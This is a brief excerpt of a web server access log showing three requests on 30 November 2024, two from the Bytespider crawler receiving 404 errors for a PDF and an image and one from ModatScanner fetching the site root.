156.59.198.136 - - [30/Nov/2024:20:23:26 +0100] "GET /renault.activities.at/htdocs/binaries/10269839.pdf HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
57.129.64.10 - - [30/Nov/2024:20:25:34 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; ModatScanner/1.0; +https://modat.io/)"
156.59.198.136 - - [30/Nov/2024:20:28:42 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/rule.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
